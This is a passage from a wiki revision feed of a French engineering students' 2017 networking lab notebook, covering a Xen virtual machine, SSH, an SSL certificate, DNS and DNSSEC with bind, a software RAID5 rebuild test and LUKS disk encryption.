On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.162&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46215</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46215"/>
				<updated>2017-11-13T12:47:09Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* DNS SEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
